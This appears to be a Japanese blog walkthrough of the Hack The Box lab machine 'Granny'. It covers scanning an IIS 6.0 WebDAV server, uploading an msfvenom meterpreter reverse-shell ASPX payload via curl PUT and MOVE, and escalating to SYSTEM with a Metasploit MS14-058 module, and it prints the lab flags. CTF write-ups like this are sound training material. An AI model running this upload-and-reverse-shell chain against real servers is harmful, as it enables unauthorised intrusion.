Hack The Box – Granny – Walkthrough – 忘れるために記す

80番ポートでfrontpageというアプリケーションが動作している

# nmap -A -n -F -T5 granny.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:09 UTC
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 67.33% done; ETC: 13:09 (0:00:01 remaining)
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.045s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Tue, 18 Aug 2020 13:15:25 GMT
|   WebDAV type: Unknown
|_  Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP LaserJet 4250 printer (92%), OSRAM Lightify ZigBee gateway (91%), Microsoft Xbox game console (modified, running XboxMediaCenter) (91%), Denver Electronics AC-5000W MK2 camera (90%), Nintendo Wii game console (89%), SMC SMC8014WG WAP (89%), HP 170X print server or Inkjet 3000 printer (89%), HP PSC 2400-series Photosmart printer (88%), HP ProCurve 2524 switch or 9100c Digital Sender printer (88%), Netgear WGR614v7 wireless broadband router (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# nmap -T4 --script vuln 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 13:10 UTC
Nmap scan report for 10.10.10.15
Host is up (0.038s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /_vti_bin/: Frontpage file or folder
|   /_vti_log/: Frontpage file or folder
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|   /_vti_bin/shtml.exe: Frontpage file or folder
|   /images/: Potentially interesting folder
|_  /_private/: Potentially interesting folder
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

WebDAVが有効であり、ファイルアップロードが可能

# perl nikto.pl -h http://granny.htb/
- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    granny.htb
+ Target Port:        80
+ Start Time:         2020-08-18 15:01:46 (GMT0)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (MKCOL COPY SEARCH PROPFIND LOCK PROPPATCH UNLOCK listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ Retrieved x-aspnet-version header: 1.1.4322
+ 8110 requests: 6 error(s) and 26 item(s) reported on remote host
+ End Time:           2020-08-18 15:41:16 (GMT0) (2370 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# davtest --url http://granny.htb/
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://granny.htb
********************************************************
NOTE    Random string for this session: 1qjcRJmh6BgKgoh
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh
********************************************************
 Sending test files
PUT     html    SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
PUT     php     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php
PUT     asp     FAIL
PUT     cgi     FAIL
PUT     jsp     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp
PUT     jhtml   SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml
PUT     shtml   FAIL
PUT     txt     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
PUT     aspx    FAIL
PUT     cfm     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm
PUT     pl      SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl
********************************************************
 Checking for test file execution
EXEC    html    SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
EXEC    php     FAIL
EXEC    jsp     FAIL
EXEC    jhtml   FAIL
EXEC    txt     SUCCEED:        http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
EXEC    cfm     FAIL
EXEC    pl      FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.php
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jsp
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.jhtml
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.cfm
PUT File: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.pl
Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.html
Executes: http://granny.htb/DavTestDir_1qjcRJmh6BgKgoh/davtest_1qjcRJmh6BgKgoh.txt

# echo "Test" > test.html

# curl -X PUT http://granny.htb/test.html -d @test.html

# curl http://granny.htb/test.html
Test

Exploitコードをアップロードして、シェルを奪取する

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.21 LPORT=4444 -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2716 bytes
Saved as: shell.aspx

# mv shell.aspx shell.txt

# curl -X PUT http://granny.htb/shell.txt --data-binary @shell.txt

# curl -X MOVE --header 'Destination:http://granny.htb/shell.aspx' 'http://granny.htb/shell.txt'

# msfconsole

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0

msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444

サイトにアクセスすることでセッションが取得できる。すぐにセッションが切れるため、すぐにバックグラウンドに。

[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:34020) at 2020-08-20 14:04:59 +0000

background

Background session 1? [y/N]  y

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell sparc/bsd               172.17.0.2:4444 -> 172.17.0.1:34058 (172.17.0.1)

他のWriteupではTypeがWindowsだったが、なぜかsparc/bsdだった。このせいでなかなか苦労した。

sysinfoから脆弱性を見つける

sysinfoデータ取得部分は割愛する。

# python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo /home/shimizu/granny/systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) x- Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done

MS14-058より管理者権限を取得する

msf5 exploit(multi/handler) > use windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.21
LHOST => 10.10.14.21
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 172.17.0.1 - Command shell session 1 closed.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 2 opened (172.17.0.2:4444 -> 172.17.0.1:34062) at 2020-08-20 14:23:31 +0000
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  2         meterpreter x86/windows  NT AUTHORITY\NETWORK SERVICE @ GRANNY  172.17.0.2:4444 -> 172.17.0.1:34062 (10.10.10.15)

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 2
SESSION => 2
msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

[-] Handler failed to bind to 10.10.14.21:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Launching notepad to host the exploit...
[+] Process 3620 launched.
[*] Reflectively injecting the exploit DLL into 3620...
[*] Injecting exploit into 3620...
[*] Exploit injected. Injecting payload into 3620...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:34066) at 2020-08-20 14:24:25 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 2128 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>cd C:\Documents and Settings\Lakis\Desktop
cd C:\Documents and Settings\Lakis\Desktop\

C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
700c5dc163014e22b3e408f8703f67d1

C:\Documents and Settings\Lakis\Desktop>cd C:\Documents and Settings\Administrator\Desktop
cd C:\Documents and Settings\Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9

80番ポートでfrontpageというアプリケーションが動作している

WebDAVが有効であり、ファイルアップロードが可能

Exploitコードをアップロードして、シェルを奪取する

sysinfoから脆弱性を見つける

MS14-058より管理者権限を取得する

おすすめ

Hack The Box – Blue – Walkthrough

Hack The Box – Optimum – Walkthrough

DoS/DDoS攻撃 を読んだ

DoS/DDoS攻撃を読んだ